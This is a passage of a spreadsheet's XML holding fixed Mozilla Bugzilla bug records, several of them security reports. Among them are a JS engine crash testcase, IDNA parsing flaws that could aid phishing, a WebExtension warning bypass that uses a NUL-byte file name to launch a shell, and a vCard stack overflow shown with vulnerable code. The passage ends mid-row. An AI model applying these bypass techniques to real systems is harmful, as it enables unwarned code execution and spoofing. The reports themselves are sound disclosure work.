      <c r="M3552" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3552" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3552" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3552" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q3552" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3552" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3552" t="inlineStr">
        <is>
          <t>2.2.5</t>
        </is>
      </c>
      <c r="T3552" t="n">
        <v>1</v>
      </c>
      <c r="U3552" t="n">
        <v>0</v>
      </c>
      <c r="V3552" t="n">
        <v>3</v>
      </c>
      <c r="W3552" t="inlineStr">
        <is>
          <t>1.2.(2|3) is a security release and we should upgrade.</t>
        </is>
      </c>
      <c r="X3552" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3553">
      <c r="A3553" t="n">
        <v>886850</v>
      </c>
      <c r="B3553" t="inlineStr">
        <is>
          <t>2013-06-25 09:12:25 -0700</t>
        </is>
      </c>
      <c r="C3553" t="inlineStr">
        <is>
          <t>Assertion failure: [barrier verifier] Unmarked edge: method, at gc/Verifier.cpp:572 with setObjectMetadataCallback</t>
        </is>
      </c>
      <c r="D3553" t="inlineStr">
        <is>
          <t>2015-02-25 20:20:51 -0800</t>
        </is>
      </c>
      <c r="E3553" t="n">
        <v>1</v>
      </c>
      <c r="F3553" t="n">
        <v>1</v>
      </c>
      <c r="G3553" t="n">
        <v>3</v>
      </c>
      <c r="H3553" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3553" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3553" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3553" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3553" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3553" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3553" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3553" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3553" t="inlineStr">
        <is>
          <t>[fuzzblocker] [jsbugmon:update][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q3553" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3553" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3553" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3553" t="n">
        <v>1</v>
      </c>
      <c r="U3553" t="n">
        <v>0</v>
      </c>
      <c r="V3553" t="n">
        <v>37</v>
      </c>
      <c r="W3553" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision bc569033125a (no options required):
evaluate("\
for ( var time = 0, year = 1969; year &gt;= 0; year-- )\
  time -= TimeInYear(year);\
function TimeInYear( y ) {}\
gczeal(4);\
", { noScriptRval : true });
evaluate("setObjectMetadataCallback();", { noScriptRval : true });</t>
        </is>
      </c>
      <c r="X3553" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3554">
      <c r="A3554" t="n">
        <v>1724233</v>
      </c>
      <c r="B3554" t="inlineStr">
        <is>
          <t>2021-08-05 08:05:00 -0700</t>
        </is>
      </c>
      <c r="C3554" t="inlineStr">
        <is>
          <t>IDNA does not conform to RFC and is interpreted as a different hostname</t>
        </is>
      </c>
      <c r="D3554" t="inlineStr">
        <is>
          <t>2024-05-30 10:35:30 -0700</t>
        </is>
      </c>
      <c r="E3554" t="n">
        <v>1</v>
      </c>
      <c r="F3554" t="n">
        <v>1</v>
      </c>
      <c r="G3554" t="n">
        <v>3</v>
      </c>
      <c r="H3554" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3554" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3554" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3554" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3554" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3554" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3554" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3554" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3554" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][necko-triaged][post-critsmash-triage][adv-main94+]</t>
        </is>
      </c>
      <c r="Q3554" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3554" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3554" t="inlineStr">
        <is>
          <t>94 Branch</t>
        </is>
      </c>
      <c r="T3554" t="n">
        <v>1</v>
      </c>
      <c r="U3554" t="n">
        <v>0</v>
      </c>
      <c r="V3554" t="n">
        <v>20</v>
      </c>
      <c r="W3554" t="inlineStr">
        <is>
          <t>Firefox 90.0.2 (Latest MacOS/Windows)
Firefox's URL parser cannot correctly parse IDNA(Internationalizing Domain Names in Applications). 
You can check the behavior with the following HTML and JavaScript.
[HTML Sample] &lt;a href="http://xn--あああ.example.com"&gt;URL&lt;/a&gt;
[JavaScript Sample] new URL("http://xn--あああ.example.com").href
("あ" is U+3042 character)
Actual behavior:
  "http://xn--bbb.example.com"
Expected behavior: 
   "xn--あああ" is an invalid label for a domain name. Only alphanumeric characters are allowed after "xn--". Browsers should treat it as an error.
&lt;Security Risk&gt;
- Bypassing WAF and malware scanning
- Phishing
- Inconsistencies with applications that expect to be RFC compliant
&lt;Cause of the problem&gt;
  The codepoint for "あ" is U+3042, and the codepoint for "B" is "U+0042.
  I think Firefox's URL parser ignore the upper bytes of the string following "xn--" and try to interpret it.
&lt;Other URLs that can be interpreted incorrectly&gt;
  http://👨‍🦰.tk
  (This is the domain name I got.）
  The codepoints sequence for the 👨‍🦰 emoji is U+1F468 U+200D U+1F9B0.
  Actual Parsed Result [Firefox]:
    http://xn--1ugz855p6kd.tk
  Expected Parsed Result [ Chrome, ICU (International Components for Unicode) ]:
    http://xn--qq8hq8f.tk/
    (Removed Zero Width Joiner(U+200D) )
&lt;Note&gt;
  Apple Safari has the same problem. I have already reported the issue to apple.</t>
        </is>
      </c>
      <c r="X3554" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3555">
      <c r="A3555" t="n">
        <v>841888</v>
      </c>
      <c r="B3555" t="inlineStr">
        <is>
          <t>2013-02-15 13:08:13 -0800</t>
        </is>
      </c>
      <c r="C3555" t="inlineStr">
        <is>
          <t>build scheduler master fails to poll gaia-master</t>
        </is>
      </c>
      <c r="D3555" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E3555" t="n">
        <v>1</v>
      </c>
      <c r="F3555" t="n">
        <v>1</v>
      </c>
      <c r="G3555" t="n">
        <v>5</v>
      </c>
      <c r="H3555" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3555" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3555" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3555" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3555" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3555" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3555" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3555" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3555" t="inlineStr"/>
      <c r="Q3555" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3555" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3555" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3555" t="n">
        <v>1</v>
      </c>
      <c r="U3555" t="n">
        <v>0</v>
      </c>
      <c r="V3555" t="n">
        <v>6</v>
      </c>
      <c r="W3555" t="inlineStr">
        <is>
          <t>2013-02-15 13:06:50-0800 [HTTPPageGetter,client] &lt;HgPoller for http://hg.mozilla.org/projects/gaia-master&gt;: polling failed, result Not Found
2013-02-15 13:06:50-0800 [HTTPPageGetter,client] Traceback (most recent call last):
2013-02-15 13:06:50-0800 [HTTPPageGetter,client] Failure: twisted.web.error.Error: 404 Not Found</t>
        </is>
      </c>
      <c r="X3555" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3556">
      <c r="A3556" t="n">
        <v>430013</v>
      </c>
      <c r="B3556" t="inlineStr">
        <is>
          <t>2008-04-21 03:41:01 -0700</t>
        </is>
      </c>
      <c r="C3556" t="inlineStr">
        <is>
          <t>@INC behaviour is non-obvious for extensions</t>
        </is>
      </c>
      <c r="D3556" t="inlineStr">
        <is>
          <t>2009-11-24 17:50:58 -0800</t>
        </is>
      </c>
      <c r="E3556" t="n">
        <v>1</v>
      </c>
      <c r="F3556" t="n">
        <v>1</v>
      </c>
      <c r="G3556" t="n">
        <v>4</v>
      </c>
      <c r="H3556" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3556" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3556" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K3556" t="inlineStr">
        <is>
          <t>3.1.3</t>
        </is>
      </c>
      <c r="L3556" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3556" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3556" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3556" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3556" t="inlineStr"/>
      <c r="Q3556" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3556" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3556" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T3556" t="n">
        <v>1</v>
      </c>
      <c r="U3556" t="n">
        <v>0</v>
      </c>
      <c r="V3556" t="n">
        <v>5</v>
      </c>
      <c r="W3556" t="inlineStr">
        <is>
          <t>The behaviour for @INC for extensions is bizarre and non-obvous. Its temporarily pushed around code hooks, but the actual code hooks have to pass back strings that can later be required (eg for webservices), so they end up using module names of extensions::foo::lib::WSFoo which is sort of sucky.... None of the exentions we have have support libraries, but it would be really confusing, since the name would be different in different contexts.
@INC should have extensions/&lt;foo&gt;/lib pushed on the front at startup, for all enabled extensions. We should define and document what namespace under that can be used to avoid conflicts (Bugzilla::Extension::&lt;name&gt; ?)</t>
        </is>
      </c>
      <c r="X3556" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3557">
      <c r="A3557" t="n">
        <v>923272</v>
      </c>
      <c r="B3557" t="inlineStr">
        <is>
          <t>2013-10-02 13:30:31 -0700</t>
        </is>
      </c>
      <c r="C3557" t="inlineStr">
        <is>
          <t>Navigation For Small screen devices</t>
        </is>
      </c>
      <c r="D3557" t="inlineStr">
        <is>
          <t>2020-05-15 11:41:36 -0700</t>
        </is>
      </c>
      <c r="E3557" t="n">
        <v>1</v>
      </c>
      <c r="F3557" t="n">
        <v>1</v>
      </c>
      <c r="G3557" t="n">
        <v>6</v>
      </c>
      <c r="H3557" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3557" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3557" t="inlineStr">
        <is>
          <t>Design</t>
        </is>
      </c>
      <c r="K3557" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3557" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3557" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N3557" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3557" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3557" t="inlineStr">
        <is>
          <t>[specification][type:feature]</t>
        </is>
      </c>
      <c r="Q3557" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3557" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3557" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3557" t="n">
        <v>0</v>
      </c>
      <c r="U3557" t="n">
        <v>0</v>
      </c>
      <c r="V3557" t="n">
        <v>2</v>
      </c>
      <c r="W3557" t="inlineStr">
        <is>
          <t>What problems would this solve?
===============================
since we decided to go with RWD for MDN, it won't be fine to have a messed menu on top.
So with a different menu for small screen devices will solve the problem of navagation
Who would use this?
===================
All the mobile and tablet users will definitely find this very handy to use as they don't have to buzz around selecting links around the target link they wanted to choose as they use hand rather than a pointed mouse.
This will definitely increase the usability
What would users see?
=====================
Small screen device users will see a different navigation menu, which is different from the one that is shown now or for the large screen one.
This new menu will allow them to select the links without clicking on other links and going some where.
What would users do? What would happen as a result?
===================================================
User will be able to navigate properly and get the information they wanted, without the need to puzzling around.
Is there anything else we should know?
======================================
This is a must have for the NEW MDN design, and it should be implemented ASAP before the launching as we will only be displaying the necessary links for the user we will definitely need some time to test them with our developers.</t>
        </is>
      </c>
      <c r="X3557" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3558">
      <c r="A3558" t="n">
        <v>929261</v>
      </c>
      <c r="B3558" t="inlineStr">
        <is>
          <t>2013-10-21 17:20:20 -0700</t>
        </is>
      </c>
      <c r="C3558" t="inlineStr">
        <is>
          <t>GetElementIC typed array stub doesn't property respect monitoredResult()</t>
        </is>
      </c>
      <c r="D3558" t="inlineStr">
        <is>
          <t>2015-02-25 20:20:39 -0800</t>
        </is>
      </c>
      <c r="E3558" t="n">
        <v>1</v>
      </c>
      <c r="F3558" t="n">
        <v>1</v>
      </c>
      <c r="G3558" t="n">
        <v>3</v>
      </c>
      <c r="H3558" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3558" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3558" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3558" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3558" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3558" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3558" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3558" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3558" t="inlineStr">
        <is>
          <t>[adv-main26+][adv-esr24.2+][qa-]</t>
        </is>
      </c>
      <c r="Q3558" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3558" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3558" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T3558" t="n">
        <v>1</v>
      </c>
      <c r="U3558" t="n">
        <v>0</v>
      </c>
      <c r="V3558" t="n">
        <v>21</v>
      </c>
      <c r="W3558" t="inlineStr">
        <is>
          <t>We should not generate typed array stubs (or any IC stub, for that matter) that know a priori that both they could generate a type that is not in the observed typesets, and that they will not be monitored.
We even have a flag for just this purpose in GetElementIC...we just seem to blissfully ignore it.
This works great, until the whole house burns down. I am currently standing in the ashes of my former home.
This manifests with the patch in 923717 applied, on asm.js/testZOOB.js.
Marking s-s, since this causes fairly random behavior, as it runs afoul of our optimization scheme.
Don't know how old it is, guessing at least through 25...</t>
        </is>
      </c>
      <c r="X3558" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3559">
      <c r="A3559" t="n">
        <v>481345</v>
      </c>
      <c r="B3559" t="inlineStr">
        <is>
          <t>2009-03-03 21:12:36 -0800</t>
        </is>
      </c>
      <c r="C3559" t="inlineStr">
        <is>
          <t>Weave should be disabled while offline or private browsing mode is active</t>
        </is>
      </c>
      <c r="D3559" t="inlineStr">
        <is>
          <t>2010-08-31 11:38:28 -0700</t>
        </is>
      </c>
      <c r="E3559" t="n">
        <v>1</v>
      </c>
      <c r="F3559" t="n">
        <v>1</v>
      </c>
      <c r="G3559" t="n">
        <v>2</v>
      </c>
      <c r="H3559" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3559" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J3559" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3559" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3559" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3559" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3559" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3559" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3559" t="inlineStr"/>
      <c r="Q3559" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3559" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3559" t="inlineStr">
        <is>
          <t>0.3</t>
        </is>
      </c>
      <c r="T3559" t="n">
        <v>1</v>
      </c>
      <c r="U3559" t="n">
        <v>0</v>
      </c>
      <c r="V3559" t="n">
        <v>9</v>
      </c>
      <c r="W3559" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090303 Minefield/3.2a1pre
Build Identifier: 
Weave shouldn't upload to server opened tabs data if private browsing mode is active.
Reproducible: Always
Steps to Reproduce:
1. have work and syced 2 profile, tab sync on and running
2. switch one of profiles into private browsing mode
3. press "sync now", or wait for auto sync
4. sync on another profile
Actual Results:  
on other profile you see tabs opened on other profile in private mode
Expected Results:  
no one tab or history record opened in private browsing mode should be available on other computers or after exit from private browsing mode</t>
        </is>
      </c>
      <c r="X3559" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3560">
      <c r="A3560" t="n">
        <v>1390882</v>
      </c>
      <c r="B3560" t="inlineStr">
        <is>
          <t>2017-08-16 06:49:23 -0700</t>
        </is>
      </c>
      <c r="C3560" t="inlineStr">
        <is>
          <t>WebExtension can bypass warnings and run arbitrary programs with download.download &amp; downloads.open</t>
        </is>
      </c>
      <c r="D3560" t="inlineStr">
        <is>
          <t>2024-05-30 09:35:59 -0700</t>
        </is>
      </c>
      <c r="E3560" t="n">
        <v>1</v>
      </c>
      <c r="F3560" t="n">
        <v>1</v>
      </c>
      <c r="G3560" t="n">
        <v>3</v>
      </c>
      <c r="H3560" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3560" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3560" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K3560" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L3560" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3560" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3560" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3560" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3560" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage] fixed by bug 1402279</t>
        </is>
      </c>
      <c r="Q3560" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3560" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3560" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3560" t="n">
        <v>1</v>
      </c>
      <c r="U3560" t="n">
        <v>0</v>
      </c>
      <c r="V3560" t="n">
        <v>7</v>
      </c>
      <c r="W3560" t="inlineStr">
        <is>
          <t>Created attachment 8897851
downloads-download-open.zip
Tested on Windows 7, Firefox 55.0.1 (20170809080026) and Firefox 57.0a1 (20170815100349)
Extensions written using the WebExtensions API are usually shielded from the user's OS and filesystem.
An extension can save arbitrary data to the user's filesystem using downloads.download.
And with downloads.open, the extension can open the file. If the file is dangerous (e.g. .exe opposed to .txt), then normally there is a warning dialog to make users aware that a program is being downloaded and run.
However, this check is trivial to bypass.
1. Load the attached extension (e.g. download, unzip it and load it via about:debugging).
2. On Windows, the extension will open a cmd shell (and start mspaint) without warning.
   (When I tested on Linux, a text editor was opened without warning)
What happens is that:
1. The extension calls downloads.download with a file name that ends with a NULL byte (e.g. "foo.bat\x00").
2. downloads.open ultimately ends up calling DownloadIntegration.launchDownload, where the download prompt is only guarded behind whether a file is "executable" [1].
3. isExecutable is implemented in nsLocalFileWin.cpp, as nsLocalFile::IsExecutable. When faced with a trailing NUL byte, the blacklist-based check fails (because "cmd\x00" is not equal to "cmd").
4. Then mimeInfo.preferredAction is set to system, and mimeInfo.launchWithFile is called. [2]
5. The system will ignore the NUL byte and treat the file as "foo.bat" and spawn a shell.
In Firefox beta (56), a user gesture requirement was added to downloads.open (bug 1369782), which makes this bug only a tiny little bit less severe (extensions can open tabs at will and it is not unlikely for the user to click or type within that page).
What should have happened is that the file extension was recognized as dangerous, either at the WebExtension layer in ext-downloads.js, or in nsLocalFile::IsExecutable in nsLocalFileWin.cpp
[1] https://searchfox.org/mozilla-central/rev/13148faaa91a1c823a7d68563d9995480e714979/toolkit/components/jsdownloads/src/DownloadIntegration.jsm#607-617
[2] https://searchfox.org/mozilla-central/rev/13148faaa91a1c823a7d68563d9995480e714979/toolkit/components/jsdownloads/src/DownloadIntegration.jsm#648-657</t>
        </is>
      </c>
      <c r="X3560" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3561">
      <c r="A3561" t="n">
        <v>1023121</v>
      </c>
      <c r="B3561" t="inlineStr">
        <is>
          <t>2014-06-10 01:14:04 -0700</t>
        </is>
      </c>
      <c r="C3561" t="inlineStr">
        <is>
          <t>Use-after-free in nsDocLoader::OnProgress</t>
        </is>
      </c>
      <c r="D3561" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:12 -0700</t>
        </is>
      </c>
      <c r="E3561" t="n">
        <v>1</v>
      </c>
      <c r="F3561" t="n">
        <v>1</v>
      </c>
      <c r="G3561" t="n">
        <v>3</v>
      </c>
      <c r="H3561" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3561" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3561" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3561" t="inlineStr">
        <is>
          <t>29 Branch</t>
        </is>
      </c>
      <c r="L3561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3561" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3561" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3561" t="inlineStr">
        <is>
          <t>[qa-][adv-main31+][adv-esr24.7+] original description in comment 26</t>
        </is>
      </c>
      <c r="Q3561" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3561" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3561" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T3561" t="n">
        <v>1</v>
      </c>
      <c r="U3561" t="n">
        <v>0</v>
      </c>
      <c r="V3561" t="n">
        <v>25</v>
      </c>
      <c r="W3561" t="inlineStr">
        <is>
          <t>Oh I forgot to mention the actual memory write (corruption) happens on line 1087. All lines numbers are from FIREFOX_AURORA_29_BASE: https://hg.mozilla.org/mozilla-central/file/ba2cc1eda988/uriloader/base/nsDocLoader.cpp</t>
        </is>
      </c>
      <c r="X3561" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3562">
      <c r="A3562" t="n">
        <v>257314</v>
      </c>
      <c r="B3562" t="inlineStr">
        <is>
          <t>2004-08-29 06:23:46 -0700</t>
        </is>
      </c>
      <c r="C3562" t="inlineStr">
        <is>
          <t>stack based buffer overflow with vcards when previewing email message</t>
        </is>
      </c>
      <c r="D3562" t="inlineStr">
        <is>
          <t>2006-03-12 17:55:34 -0800</t>
        </is>
      </c>
      <c r="E3562" t="n">
        <v>1</v>
      </c>
      <c r="F3562" t="n">
        <v>1</v>
      </c>
      <c r="G3562" t="n">
        <v>3</v>
      </c>
      <c r="H3562" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3562" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3562" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3562" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3562" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3562" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3562" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q3562" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3562" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3562" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3562" t="n">
        <v>1</v>
      </c>
      <c r="U3562" t="n">
        <v>0</v>
      </c>
      <c r="V3562" t="n">
        <v>21</v>
      </c>
      <c r="W3562" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040115
Build Identifier: Mozilla/5.0
There is stack based bufferoverflow in mozilla mail when handling vcards.
The stack is quite screwed.
It is triggered by just previewing a specially crafted message.
Tested on mozilla 1.7 (because 1.7.2 fails to build due to missing directories),
but the code seems present in 1.7.2 and thunderbird 0.7 also.
Obviously the following code is quite fucked:
--------
addrbook/src/nsVCardObj.cpp
static void writeGroup(OFile *fp, VObject *o)
{
    char buf1[256];
    char buf2[256];
    PL_strcpy(buf1,NAME_OF(o));
    while ((o=isAPropertyOf(o,VCGroupingProp)) != 0) {
  PL_strcpy(buf2,STRINGZ_VALUE_OF(o));
  PL_strcat(buf2,".");
  PL_strcat(buf2,buf1);
  PL_strcpy(buf1,buf2);
  }
    appendsOFile(fp,buf1);
}
--------
To reproduce send the vcard fuckmicrosft.vcf (which will be shortly attached)
as attachment and then preview the message.
--------------------------------------------------
(gdb) info stack
#9  0x45962c5b in initPropIterator (i=0xbfffe2a8, o=0x67676767)
    at nsVCardObj.cpp:383
#10 0x45962d2a in isAPropertyOf (o=0x67676767, id=0x4598bc69 "grouping")
    at nsVCardObj.cpp:418
#11 0x45964552 in writeGroup (fp=0x67676767, o=0x67676767)
    at nsVCardObj.cpp:1350
#12 0x67676767 in ?? ()
#13 0x67676767 in ?? ()
#14 0x67676767 in ?? ()
#15 0x67676767 in ?? ()
#16 0x67676767 in ?? ()
#17 0x67676767 in ?? ()
#18 0x67676767 in ?? ()
-------------------------------------------------
georgi
Reproducible: Always
Steps to Reproduce:
1. will attach a testcase
Actual Results:  
stack is screwed
Expected Results:  
stack should not be screwed</t>
        </is>
      </c>
      <c r="X3562" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3563">
      <c r="A3563" t="n">
        <v>1329850</v>
      </c>
      <c r="B3563" t="inlineStr">
        <is>
          <t>2017-01-09 18:03:33 -0800</t>
        </is>
      </c>
      <c r="C3563" t="inlineStr">
        <is>
          <t>Exceptions creating outgoing records aren't handled correctly nor reported via telemetry</t>
        </is>
      </c>
      <c r="D3563" t="inlineStr">
        <is>
          <t>2017-02-01 04:15:44 -0800</t>
        </is>
      </c>
      <c r="E3563" t="n">
        <v>1</v>
      </c>
      <c r="F3563" t="n">
        <v>1</v>
      </c>
      <c r="G3563" t="n">
        <v>2</v>
      </c>
      <c r="H3563" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3563" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3563" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K3563" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3563" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3563" t="inlineStr">
        <is>
